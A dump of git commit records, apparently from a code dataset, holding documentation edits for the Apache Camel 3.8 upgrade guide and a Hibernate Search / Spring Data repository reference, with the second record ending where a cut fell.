{"commit":"c53091b982946f3eb52087bd7f425d886ff62984","subject":"Polished","message":"Polished\n","repos":"cunningt\/camel,pax95\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,nikhilvibhav\/camel,tdiesler\/camel,tdiesler\/camel,nikhilvibhav\/camel,pax95\/camel,adessaigne\/camel,cunningt\/camel,pmoerenhout\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,apache\/camel,christophd\/camel,nikhilvibhav\/camel,pax95\/camel,christophd\/camel,apache\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,apache\/camel,tdiesler\/camel,christophd\/camel,tadayosi\/camel,cunningt\/camel,pmoerenhout\/camel,pax95\/camel,cunningt\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,tadayosi\/camel,pmoerenhout\/camel,cunningt\/camel,tdiesler\/camel,cunningt\/camel,tadayosi\/camel,pax95\/camel,pax95\/camel,apache\/camel,tdiesler\/camel,tdiesler\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_8.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_8.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example, if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.7 to 3.8\n\n=== Route startup procedure change\n\nCamel will now initialize all routes during initialization of `CamelContext` itself.\nBefore, all routes were lazily initialized when they were started, which happens in the starting phase of `CamelContext`.\nBy moving this forward to the initialization phase, we ensure it is all done together.\n\nThis means that all the resources used in the routes such as EIPs, processors, beans, components, data formats, languages, etc.\nare also initialized. An effect of this change is that any custom Camel component that may do initialization logic in\nthe constructors of `Consumer` or `Producer` should *not* do this, but move this logic to `doInit` or `doStart` where\nsuch logic belongs.
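\n\nFor example, a minimal sketch of a custom consumer following this rule (`MyClient` is a hypothetical resource):\n\n[source,java]\n----\nimport org.apache.camel.Endpoint;\nimport org.apache.camel.Processor;\nimport org.apache.camel.support.DefaultConsumer;\n\npublic class MyConsumer extends DefaultConsumer {\n\n    private MyClient client;\n\n    public MyConsumer(Endpoint endpoint, Processor processor) {\n        super(endpoint, processor);\n        \/\/ do not create expensive resources in the constructor\n    }\n\n    @Override\n    protected void doStart() throws Exception {\n        super.doStart();\n        \/\/ create the resource when the consumer is started instead\n        client = new MyClient();\n    }\n}\n----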
An affect of this change is that any custom Camel component that may do initialization logic in\nthe constructors of `Consumer` or `Producer` should *not* do this, but move this logic to `doInit` or `doStart` where\nsuch logic belongs.\n\n=== API changes\n\nThe following type names are renamed in `CamelEvent.Type` enum:\n\n- `CamelContextRoutesStarting` to `RoutesStarting`\n- `CamelContextRoutesStarted` to `RoutesStarted`\n- `CamelContextRoutesStopping` to `RoutesStopping`\n- `CamelContextRoutesStopped` to `RoutesStopped`\n\nThe method `isOnlyDynamicQueryParameters` was removed from `org.apache.camel.spi.SendDynamicAware` and\n`org.apache.camel.support.component.SendDynamicAwareSupport` classes.\n\nThe class `PackageScanResourceResolver` has been revisited and the method `findResources` now returns a collection of `org.apache.camel.spi.Resource`\nwhich provide both the location of the resolved resources and a method to open the related `InpuStream`:\n\n[source,java]\n----\nCollection<Resource> findResources(String location) throws Exception;\n----\n\n=== OnCompletion EIP\n\nThe `onCompletion` EIP has been fixed. It could trigger multiple completions for a given `Exchange` before.\n\n=== Transactions and Multicast, Splitter, or Recipient List EIPs\n\nWhen using `transacted` in Camel routes with Multicast, Splitter, or Recipient List EIPs, the exection strackframe\ncould grown deep and this could cause a stack overflow exception. This has been fixed by refactoring the EIP into a special\ntransacted mode and the existing reactive mode.\n\nWe do not anticipate any issues but if you are using transactions and these EIPs then we would like to have feedback\nif you encounter any problems with upgrading.\n\n=== camel-jackson\n\nIn the XML DSL `jsonView` has been renamed to `jsonViewTypeName` and made general available in the model\nand for the lightweight `camel-xml-io` route parser.\n\n=== camel-caffeine-lrucache\n\nThis LRUCache implementation is using an algorithm where elements that are removed may not be in strict order, and therefore\nnot ideal for LRU caches assuming ordering.\n\nThe implementation is not needed anymore in Camel 3, as we are using a simpler default implementation internally.\nThis component was deprecated, and has been removed as Maven dependency in `camel-core` pom.xml file.\n\n=== camel-activemq and camel-jms\n\nThe JMS and ActiveMQ components now support the optimized toD EIP pattern by using a single endpoint\/producer for dynamic destination names.\n\n=== camel-sjms and camel-sjms2\n\nThese two components have been overhauled and re-written with the goal of being more feature complete with the Spring JMS component.\nThey no longer uses their own connection pooling, but let you use the existing 3rd party pooling for `ConnectionFactory` which is common practice.\nThe components are now reactive and non-blocking, and support the optimized toD EIP pattern by using a single endpoint\/producer for dynamic destination names.\n\nMany of the previous features and configuration options have been removed\/renamed.\nTo migrate you need to read their documentation and see what options they now offer.\n\n=== camel-aws2-sns\n\nThe policy option now expects a file, since the policy is going to be complex. It can be from classpath:, http: or file: etc.\n\n=== camel-aws2-sqs\n\nThe policy option now expects a file, since the policy is going to be complex. 
\n\n=== camel-github\n\nThe Camel GitHub Commit consumer has been changed a bit.\n\nFor each exchange, you will now get the full commit message in the body as a String, and not the Commit object as before.\n\nOther information is stored in headers declared in the `GitHubConstants` class:\n\n* GITHUB_COMMIT_AUTHOR - `CamelGitHubCommitAuthor` - The commit author\n* GITHUB_COMMIT_COMMITTER - `CamelGitHubCommitCommitter` - The committer name\n* GITHUB_COMMIT_SHA - `CamelGitHubCommitSha` - The commit SHA\n* GITHUB_COMMIT_URL - `CamelGitHubCommitUrl` - The commit URL\n\nThe Camel GitHub Events consumer has been changed a bit.\n\nFor each exchange, you will now get the event type in the body as a String, and not the Event object as before.\n\nOther information is stored in headers declared in the `GitHubConstants` class:\n\n* GITHUB_EVENT_PAYLOAD - `CamelGitHubEventPayload` - The event payload\n\n=== camel-infinispan\n\nThere are now two components for Infinispan:\n\n- *camel-infinispan* to integrate with remote caches through the Hot Rod protocol (scheme: *infinispan*).\n- *camel-infinispan-embedded* to integrate with local\/embedded caches (scheme: *infinispan-embedded*).\n\nAs a consequence of the refactoring:\n\nThe remote and embedded endpoints now support the same capabilities; for example, queries were previously only possible on a remote cache and are now supported on both remote and local\/embedded caches.\nThe configuration options for the endpoint are now specific to the context, which removes the possibility of mixing unrelated properties.\nSome classes (such as the idempotent and aggregation repositories) have been moved from `org.apache.camel.component.infinispan.processor.*` to `org.apache.camel.component.infinispan.embedded` or `org.apache.camel.component.infinispan.remote`:\n- `org.apache.camel.component.infinispan.embedded.InfinispanEmbeddedAggregationRepository`\n- `org.apache.camel.component.infinispan.embedded.InfinispanEmbeddedIdempotentRepository`\n- `org.apache.camel.component.infinispan.remote.InfinispanRemoteAggregationRepository`\n- `org.apache.camel.component.infinispan.remote.InfinispanRemoteIdempotentRepository`\n\n=== camel-aws\n\nAll the camel-aws components except camel-aws-xray have been deprecated. We suggest migrating to the camel-aws2-* components,\nbecause in future releases the AWS components will be removed, and with the next LTS release (3.10 probably)\nthe camel-aws2 components will be renamed to camel-aws.\n\n\n","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.7 to 3.8\n\n=== Route startup procedure change\n\nCamel will now initialize all routes during initialization of `CamelContext` itself.\nBefore all routes where lazy initialized when they were started, which happens in the starting phase of `CamelContext`.\nBy moving this forward to initialization phase, we ensure all is done together.\n\nThis means that all the resources used in the routes such as EIPs, processors, beans, components, data formats, languages etc.\nare also initialized. 
An affect of this change is that any custom Camel component that may do initialization logic in\nthe constructors of `Consumer` or `Producer` should *not* do this, but move this logic to `doInit` or `doStart` where\nsuch logic belongs.\n\n=== API changes\n\nThe following type names are renamed in `CamelEvent.Type` enum:\n\n- `CamelContextRoutesStarting` to `RoutesStarting`\n- `CamelContextRoutesStarted` to `RoutesStarted`\n- `CamelContextRoutesStopping` to `RoutesStopping`\n- `CamelContextRoutesStopped` to `RoutesStopped`\n\nThe method `isOnlyDynamicQueryParameters` was removed from `org.apache.camel.spi.SendDynamicAware` and\n`org.apache.camel.support.component.SendDynamicAwareSupport` classes.\n\nThe class `PackageScanResourceResolver` has been revisited and the method `findResources` now returns a collection of `org.apache.camel.spi.Resource`\nwhich provide both the location of the resolved resources and a method to open the related `InpuStream`:\n\n[source,java]\n----\nCollection<Resource> findResources(String location) throws Exception;\n----\n\n=== OnCompletion EIP\n\nThe `onCompletion` EIP has been fixed. It could trigger multiple completions for a given `Exchange` before.\n\n=== Transactions and Multicast, Splitter, or Recipient List EIPs\n\nWhen using `transacted` in Camel routes with Multicast, Splitter, or Recipient List EIPs, the exection strackframe\ncould grown deep and this could cause a stack overflow exception. This has been fixed by refactoring the EIP into a special\ntransacted mode and the existing reactive mode.\n\nWe do not anticipate any issues but if you are using transactions and these EIPs then we would like to have feedback\nif you encounter any problems with upgrading.\n\n=== camel-jackson\n\nIn the XML DSL `jsonView` has been renamed to `jsonViewTypeName` and made general available in the model\nand for the lightweight `camel-xml-io` route parser.\n\n=== camel-caffeine-lrucache\n\nThis LRUCache implementation is using an algorithm where elements that are removed may not be in strict order, and therefore\nnot ideal for LRU caches assuming ordering.\n\nThe implementation is not needed anymore in Camel 3, as we are using a simpler default implementation internally.\nThis component was deprecated, and has been removed as Maven dependency in `camel-core` pom.xml file.\n\n=== camel-activemq and camel-jms\n\nThe JMS and ActiveMQ components now support the optimized toD EIP pattern by using a single endpoint\/producer for dynamic destination names.\n\n=== camel-sjms and camel-sjms2\n\nThese two components have been overhauled and re-written with the goal of being more feature complete with the Spring JMS component.\nThey no longer uses their own connection pooling, but let you use the existing 3rd party pooling for `ConnectionFactory` which is common practice.\nThe components are now reactive and non-blocking, and support the optimized toD EIP pattern by using a single endpoint\/producer for dynamic destination names.\n\nMany of the previous features and configuration options have been removed\/renamed.\nTo migrate you need to read their documentation and see what options they now offer.\n\n=== Camel-AWS2-SNS\n\nThe policy option now expects a file, since the policy is going to be complex. It can be from classpath:, http: or file: etc.\n\n=== Camel-AWS2-SQS\n\nThe policy option now expects a file, since the policy is going to be complex. 
It can be from classpath:, http: or file: etc.\n\n=== Camel-Github\n\nThe Camel Github Commit consumer has been changed a bit.\n\nFor each exchange now in the body you'll get the commit full message as a String and not the Commit Object like before.\n\nOther information has been stored in headers declared in GitHubConstants class:\n\n* GITHUB_COMMIT_AUTHOR - \"CamelGitHubCommitAuthor\" - The commit Author\n* GITHUB_COMMIT_COMMITTER - \"CamelGitHubCommitCommitter\" - The committer name\n* GITHUB_COMMIT_SHA - \"CamelGitHubCommitSha\" - The commit sha\n* GITHUB_COMMIT_URL - \"CamelGitHubCommitUrl\" - The commit url\n\nThe Camel Github Events consumer has been changed a bit.\n\nFor each exchange now in the body you'll get the event type as a String and not the Event Object like before.\n\nOther information has been stored in headers declared in GitHubConstants class:\n\n* GITHUB_EVENT_PAYLOAD - \"CamelGitHubEventPayload\" - The event payload\n\n=== Camel-infinispan\n\nThere are now two components for Infinispan:\n\n- *camel-infinispan* to integrate with remote caches through the Hot Rod protocol (scheme: *infinispan*).\n- *camel-infinispan-embedded* to integrate with local\/embedded caches (scheme: *infinispan-embedded*).\n\nAs consequence of the refactor:\n\n- the remote and embedded endpoints provide support the same capabilities, as example queries were only possible on a remote cache and now they are suported on both remote and local\/embedded caches\n- the configuration options for the endpoint are now specific to the context which remove the possibility to mix unrelated propertis\n- some classes have been relocated, as example, indempotent and aggregation repositories have been moved from `org.apache.camel.component.infinispan.processor.*` to `org.apache.camel.component.infinispan.embedded` or `org.apache.camel.component.infinispan.remote`:\n+\norg.apache.camel.component.infinispan.embedded.InfinispanEmbeddedAggregationRepository\norg.apache.camel.component.infinispan.embedded.InfinispanEmbeddedIdempotentRepository\norg.apache.camel.component.infinispan.remote.InfinispanRemoteAggregationRepository\norg.apache.camel.component.infinispan.remote.InfinispanRemoteIdempotentRepository\n\n=== Camel-AWS\n\nAll the camel-aws components except camel-aws-xray have been deprecated. We suggest to migrate to Camel-AWS2-* components, because in future releases the AWS components will be removed and with the next LTS release (3.10 probably) camel-aws2 components will be renamed to camel-aws.\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0c65cd590a148d37ef62580db44352aad9e6dc5","subject":"Nowrap.","message":"Nowrap.\n","repos":"alesj\/hs-data-poc","old_file":"documentation\/src\/main\/asciidoc\/reference\/data-hibernatesearch.adoc","new_file":"documentation\/src\/main\/asciidoc\/reference\/data-hibernatesearch.adoc","new_contents":"[[hibernatesearch.jpaextension]]\n= JPA repository extension setup\n\nThis section explains how to set up the Hibernate Search \/ Spring Data integration\nto extend JPA repositories.\n\nWith such a setup, you will be able to add Hibernate Search query methods\n(i.e. 
methods targeting a full-text index) to JPA repository.\nHow exactly you can add these methods is explained in\n<<hibernatesearch.repository.extending>>.\n\n[[hibernatesearch.jpaextension.dependencies]]\n== Dependencies\n\nAdd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-jpa:{version}` in your project.\n\n[[hibernatesearch.jpaextension.configuration]]\n== Configuration\n\n[[hibernatesearch.jpaextension.configuration.annotation]]\n=== Annotation-based configuration\n\nhttps:\/\/docs.spring.io\/spring-data\/jpa\/docs\/current\/reference\/html\/#jpa.introduction[Set up the JPA Spring Data module as usual],\nexcept you need to override the repository factory bean class\nand set it to `me.snowdrop.data.hibernatesearch.orm.repository.support.JpaWithHibernateSearchRepositoryFactoryBean`.\n\n.Hibernate Search extension to JPA repositories using JavaConfig\n====\n[source,java,options=\"nowrap\"]\n----\n@Configuration\n@EnableJpaRepositories(\n basePackages = \"com\/example\/repositories\",\n repositoryFactoryBeanClass = JpaWithHibernateSearchRepositoryFactoryBean.class\n)\npublic class Config {\n}\n----\n====\n\n[[hibernatesearch.jpaextension.configuration.xml]]\n=== XML-based configuration\n\nWARNING: XML-based configuration is not implemented yet.\n\n[[hibernatesearch.jpaextension.configuration.cdi]]\n=== CDI configuration\n\nWARNING: CDI integration is not implemented yet.\n\n[[hibernatesearch.standalone]]\n= Standalone Hibernate Search repository setup\n\nThis section explains how to set up the Hibernate Search \/ Spring Data integration\nas standalone repositories, i.e. in a similar fashion to other Spring Data modules.\n\nWith such a setup, you will be able to create standalone,\nread-only Hibernate Search repositories.\n\n[[hibernatesearch.standalone.dependencies]]\n== Dependencies\n\nWhen using Hibernate Search integrated to Hibernate ORM,\nadd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-jpa:{version}` in your project.\n\nWhen using Hibernate Search integrated to Infinispan Query,\nadd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-infinispan:{version}` in your project.\n\n[[hibernatesearch.standalone.configuration]]\n== Configuration\n\n[[hibernatesearch.standalone.configuration.annotation]]\n=== Annotation-based configuration\n\nSpring Data Hibernate Search Repositories can be activated using the `@EnableHibernateSearchRepositories` annotation.\n\nApart from `datasourceMapperRef`, this annotation's attributes are standard and defined in\nhttps:\/\/docs.spring.io\/spring-data\/jpa\/docs\/current\/reference\/html\/#repositories.namespace-reference[Spring Data Commons' documentation]\n\nIf no base package is configured, the one the configuration class resides in will be used.\n\nThe configuration is simpler when using Spring Boot's auto-configuration:\n\n.Hibernate Search standalone repositories using JavaConfig when using Spring Boot's auto-configuration\n====\n[source,java,options=\"nowrap\"]\n----\n@Configuration\n@EnableAutoConfiguration\n@EnableHibernateSearchRepositories(basePackages = \"com\/example\/repositories\")\npublic class Config {\n}\n----\n====\n\nIf you do not want to or cannot use auto-configuration for some reason,\nyou will also need to declare additional beans:\nsee <<hibernatesearch.standalone.configuration.advanced>>.\n\n[[hibernatesearch.standalone.configuration.xml]]\n=== XML-based configuration\n\nWARNING: XML-based configuration is not implemented 
yet.\n\n[[hibernatesearch.standalone.configuration.cdi]]\n=== CDI configuration\n\nWARNING: CDI integration is not implemented yet.\n\n[[hibernatesearch.standalone.configuration.advanced]]\n=== Advanced configuration\n\nIf you don't want to use auto configuration for some reason,\nyou need to add a bean of type `me.snowdrop.data.hibernatesearch.spi.DatasourceMapper` to the context.\nThe Hibernate Search Spring Data module will look for such a bean named `datasourceMapper` by default,\nbut you can customize the bean name using `@EnableHibernateSearchRepositories.datasourceMapperRef`.\n\nWhen using Hibernate Search integrated to Hibernate ORM,\nyou can declare the bean as an instance of `me.snowdrop.data.hibernatesearch.orm.JpaDatasourceMapper`.\nIts constructor expects an `EntityManagerFactory`.\n\nWhen using Hibernate Search integrated to Infinispan Query,\nyou can declare the bean as an instance of `me.snowdrop.data.hibernatesearch.config.infinispan.InfinispanDatasourceMapper`.\nIts constructor expects a `me.snowdrop.data.hibernatesearch.config.infinispan.EntityToCacheMapper`.\n\n[[hibernatesearch.repository]]\n= Repository interfaces\n\n[[hibernatesearch.repository.extending]]\n== JPA repository extension\n\nThis section explains how to add Hibernate Search methods to a JPA repository.\nThis means that, whenever Spring Data implements these methods automatically\n(see <<hibernatesearch.query-methods.derived,derived queries>>, <<hibernatesearch.query-methods.at-query,declared queries>>),\nthey are implemented as Hibernate Search queries (i.e. methods targeting a full-text index)\ninstead of JPA queries.\n\n[NOTE]\n====\nThis feature is only available if you set up\nthe Hibernate Search \/ Spring Data integration to extend JPA repositories:\nsee <<hibernatesearch.jpaextension>>.\n====\n\nIn order to add a Hibernate Search extension to a JPA repository, you need to:\n\n* create an interface extending `me.snowdrop.data.hibernatesearch.repository.extension.RepositoryHibernateSearchExtension<T, ID>`\n* add to this interface the methods that are to be implemented as Hibernate Search queries\n* make the interface of your JPA repository extend this interface\n\n.Extending a JPA repository with Hibernate Search query methods\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepositoryHibernateSearchExtension extends RepositoryHibernateSearchExtension<Book, String> {\n List<Book> findByName(String name);\n}\n\npublic interface BookRepository extends JpaRepository<Book, String>, BookRepositoryHibernateSearchExtension {\n List<Book> findByPrice(Integer price);\n}\n\npublic class SomeComponent {\n\n @Autowired\n BookRepository bookRepository;\n\n public void doSomething() {\n \/\/ This executes a Hibernate Search query, i.e. a query on the full-text indexes, instead of a JPA query\n List<Book> books = bookRepository.findByName(\"robots dawn\");\n\n \/\/ ... 
do something with the book list ...\n }\n\n}\n----\n====\n\n[[hibernatesearch.repository.standalone]]\n== Standalone Hibernate Search repository\n\nTo declare repository interfaces, you can extend either the generic `org.springframework.data.repository.Repository<T, ID>` interface\n(if there is no ambiguity as to which Spring Data module should implement the repository)\nor the more specific `me.snowdrop.data.hibernatesearch.repository.HibernateSearchRepository<T, ID>`.\n\n[[hibernatesearch.query-methods]]\n= Query methods\n\n[[hibernatesearch.query-methods.finders]]\n== Query lookup strategies\n\nQueries can be <<hibernatesearch.query-methods.derived,derived from the method name>>,\nor be <<hibernatesearch.query-methods.at-query,defined as strings and assigned to a method>>.\n\nAs with any Spring Data module, you can also implement query methods yourself through\nhttps:\/\/docs.spring.io\/spring-data\/data-commons\/docs\/current\/reference\/html\/#repositories.custom-implementations[custom implementation fragments].\n\n[[hibernatesearch.query-methods.derived]]\n== Derived queries\n\nGenerally the query derivation mechanism for Hibernate Search works as described in\nhttps:\/\/docs.spring.io\/spring-data\/data-commons\/docs\/{springDataVersion}\/reference\/html\/#repositories.query-methods[the Spring Data Commons documentation].\n\nHere's a short example of what a Hibernate Search query method translates into:\n\n.Query creation from method names\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepository extends Repository<Book, String> {\n List<Book> findByNameAndPrice(String name, Integer price);\n} \n----\n====\n\nThe method name above will be translated into the following call to a Hibernate Search query builder:\n\n[source,java,options=\"nowrap\"]\n----\nQuery query = queryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .must(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\nA list of supported keywords for Hibernate Search is shown below.\n\n[cols=\"1,2,3\", options=\"header\"]\n.Supported keywords inside method names\n|===\n| Keyword\n| Sample\n| Query builder equivalent\n\n| `Is`\n| `findByName`\n| `queryBuilder.keyword().onField(\"name\").matching(name).createQuery()`\n\n| `And`\n| `findByNameAndPrice`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .must(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\n| `Or`\n| `findByNameOrPrice`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .should(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .should(\n queryBuilder.keyword().onField(\"price\").matching(price).createQuery()\n )\n .createQuery();\n----\n\n| `Not`\n| `findByNameNot`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(name).createQuery()\n )\n .not()\n .createQuery();\n----\n\n| `Between`\n| `findByPriceBetween`\n| `queryBuilder.range().onField(\"price\").from(lower).to(upper).createQuery()`\n\n| `LessThan`\n| `findByPriceLessThan`\n| `queryBuilder.range().onField(\"price\").below(upper).excludeLimit().createQuery()`\n\n| `LessThanEqual`\n| `findByPriceLessThanEqual`\n| `queryBuilder.range().onField(\"price\").below(upper).createQuery()`\n\n| `GreaterThan`\n| 
`findByPriceGreaterThan`\n| `queryBuilder.range().onField(\"price\").above(lower).excludeLimit().createQuery()`\n\n| `GreaterThanEqual`\n| `findByPriceGreaterThanEqual`\n| `queryBuilder.range().onField(\"price\").above(lower).createQuery()`\n\n| `Before`\n| `findByPriceBefore`\n| `queryBuilder.range().onField(\"price\").below(upper).excludeLimit().createQuery()`\n\n| `After`\n| `findByPriceAfter`\n| `queryBuilder.range().onField(\"price\").above(lower).excludeLimit().createQuery()`\n\n| `Like`\n| `findByNameLike`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(name + \"*\")`\n\n| `StartingWith`\n| `findByNameStartingWith`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(name + \"*\")`\n\n| `EndingWith`\n| `findByNameEndingWith`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(\"*\" + name)`\n\n| `Contains\/Containing`\n| `findByNameContaining`\n| `queryBuilder.keyword().wildcard().onField(\"name\").matching(\"*\" + name + \"*\")`\n\n| `In`\n| `findByNameIn(Collection<String> names)`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<first element>).createQuery()\n )\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<second element>).createQuery()\n )\n \/\/ ...\n .should(\n queryBuilder.keyword().onField(\"name\").matching(<last element>).createQuery()\n )\n .createQuery();\n----\n\n| `NotIn`\n| `findByNameNotIn(Collection<String> names)`\na|\n[source,java,options=\"nowrap\"]\n----\nqueryBuilder.bool()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<first element>).createQuery()\n )\n .not()\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<second element>).createQuery()\n )\n .not()\n \/\/ ...\n .must(\n queryBuilder.keyword().onField(\"name\").matching(<last element>).createQuery()\n )\n .not()\n .createQuery();\n----\n\n| `Near`\n| `findByStoreNear`\n| Not supported yet\n\n| `True`\n| `findByAvailableTrue`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(true)`\n\n| `False`\n| `findByAvailableFalse`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(false)`\n\n| `MatchesRegex`\/`Regex`\/`Matches`\n| `findByNameMatchesRegex`\n| `new RegexpQuery(new Term(\"name\", regexp))`\n\n| `Within`\n| `findByLocationWithin`\n| `queryBuilder.spatial().onField(\"location\").within(distance, Unit.KM).ofLatitude(latitude).andLongitude(longitude).createQuery()`\n\n| `OrderBy`\n| `findByAvailableTrueOrderByNameDesc`\n| `queryBuilder.keyword().wildcard().onField(\"available\").matching(true)` and\n`queryBuilder.sort().byField(\"name\").desc().createSort()`\n|===\n\n[[hibernatesearch.query-methods.fieldnames]]\n=== Targeting specific fields\n\nBy default, derived queries target the default field,\nthe one named after the entity property mentioned in the query method name.\nThat is to say, if your method refers to the property \"name\", the query will target the index field \"name\",\nand will expect that index field to exist.\n\nWhat if you want to target the field \"name_sort\"?\nYou can use the `@me.snowdrop.data.hibernatesearch.annotations.TargetField` annotation.\n\n.Target non-default fields using the `@TargetField` annotation.\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n @TargetField(property = \"name\", field = \"name_sort\")\n Page<Book> findByAvailableTrueOrderByNameAsc(String name, Pageable pageable);\n}\n----\n====\n\n[[hibernatesearch.query-methods.at-query]]\n== Using the @Query Annotation\n\nQueries can be defined as strings using the `me.snowdrop.data.hibernatesearch.annotations.Query` annotation.\nSuch strings are expected to use the Lucene Query syntax.\n\nThey can be named and defined in a resource file,\nthe location of which is defined when <<hibernatesearch.jpaextension.configuration,configuring>> the Hibernate Search module.\nThen the queries will be assigned to a query method using `@Query(name = \"<the query name>\")`.\n\nAlternatively, the queries can be assigned to the method directly using `@Query(\"<the query>\")`.\n\n.Declare a query at the method using the `@Query` annotation.\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n @Query(\"+name:?0\")\n Page<Book> findByName(String name, Pageable pageable);\n}\n----\n====\n
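\nIf you use named queries instead, the method can reference the name registered in the resource file. The query name below is illustrative:\n\n.Reference a named query using the `@Query` annotation.\n====\n[source,java,options=\"nowrap\"]\n----\npublic interface BookRepository extends HibernateSearchRepository<Book, String> {\n \/\/ Resolves the Lucene query string registered under this name in the resource file.\n @Query(name = \"Book.findByName\")\n Page<Book> findByName(String name, Pageable pageable);\n}\n----\n====\n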
","old_contents":"[[hibernatesearch.jpaextension]]\n= JPA repository extension setup\n\nThis section explains how to set up the Hibernate Search \/ Spring Data integration\nto extend JPA repositories.\n\nWith such a setup, you will be able to add Hibernate Search query methods\n(i.e. methods targeting a full-text index) to JPA repository.\nHow exactly you can add these methods is explained in\n<<hibernatesearch.repository.extending>>.\n\n[[hibernatesearch.jpaextension.dependencies]]\n== Dependencies\n\nAdd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-jpa:{version}` in your project.\n\n[[hibernatesearch.jpaextension.configuration]]\n== Configuration\n\n[[hibernatesearch.jpaextension.configuration.annotation]]\n=== Annotation-based configuration\n\nhttps:\/\/docs.spring.io\/spring-data\/jpa\/docs\/current\/reference\/html\/#jpa.introduction[Set up the JPA Spring Data module as usual],\nexcept you need to override the repository factory bean class\nand set it to `me.snowdrop.data.hibernatesearch.orm.repository.support.JpaWithHibernateSearchRepositoryFactoryBean`.\n\n.Hibernate Search extension to JPA repositories using JavaConfig\n====\n[source,java]\n----\n@Configuration\n@EnableJpaRepositories(\n basePackages = \"com\/example\/repositories\",\n repositoryFactoryBeanClass = JpaWithHibernateSearchRepositoryFactoryBean.class\n)\npublic class Config {\n}\n----\n====\n\n[[hibernatesearch.jpaextension.configuration.xml]]\n=== XML-based configuration\n\nWARNING: XML-based configuration is not implemented yet.\n\n[[hibernatesearch.jpaextension.configuration.cdi]]\n=== CDI configuration\n\nWARNING: CDI integration is not implemented yet.\n\n[[hibernatesearch.standalone]]\n= Standalone Hibernate Search repository setup\n\nThis section explains how to set up the Hibernate Search \/ Spring Data integration\nas standalone repositories, i.e. 
in a similar fashion to other Spring Data modules.\n\nWith such a setup, you will be able to create standalone,\nread-only Hibernate Search repositories.\n\n[[hibernatesearch.standalone.dependencies]]\n== Dependencies\n\nWhen using Hibernate Search integrated to Hibernate ORM,\nadd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-jpa:{version}` in your project.\n\nWhen using Hibernate Search integrated to Infinispan Query,\nadd a dependency to `me.snowdrop.data:spring-data-hibernate-search-starter-infinispan:{version}` in your project.\n\n[[hibernatesearch.standalone.configuration]]\n== Configuration\n\n[[hibernatesearch.standalone.configuration.annotation]]\n=== Annotation-based configuration\n\nSpring Data Hibernate Search Repositories can be activated using the `@EnableHibernateSearchRepositories` annotation.\n\nApart from `datasourceMapperRef`, this annotation's attributes are standard and defined in\nhttps:\/\/docs.spring.io\/spring-data\/jpa\/docs\/current\/reference\/html\/#repositories.namespace-reference[Spring Data Commons' documentation]\n\nIf no base package is configured, the one the configuration class resides in will be used.\n\nThe configuration is simpler when using Spring Boot's auto-configuration:\n\n.Hibernate Search standalone repositories using JavaConfig when using Spring Boot's auto-configuration\n====\n[source,java]\n----\n@Configuration\n@EnableAutoConfiguration\n@EnableHibernateSearchRepositories(basePackages = \"com\/example\/repositories\")\npublic class Config {\n}\n----\n====\n\nIf you do not want to or cannot use auto-configuration for some reason,\nyou will also need to declare additional beans:\nsee <<hibernatesearch.standalone.configuration.advanced>>.\n\n[[hibernatesearch.standalone.configuration.xml]]\n=== XML-based configuration\n\nWARNING: XML-based configuration is not implemented yet.\n\n[[hibernatesearch.standalone.configuration.cdi]]\n=== CDI configuration\n\nWARNING: CDI integration is not implemented yet.\n\n[[hibernatesearch.standalone.configuration.advanced]]\n=== Advanced configuration\n\nIf you don't want to use auto configuration for some reason,\nyou need to add a bean of type `me.snowdrop.data.hibernatesearch.spi.DatasourceMapper` to the context.\nThe Hibernate Search Spring Data module will look for such a bean named `datasourceMapper` by default,\nbut you can customize the bean name using `@EnableHibernateSearchRepositories.datasourceMapperRef`.\n\nWhen using Hibernate Search integrated to Hibernate ORM,\nyou can declare the bean as an 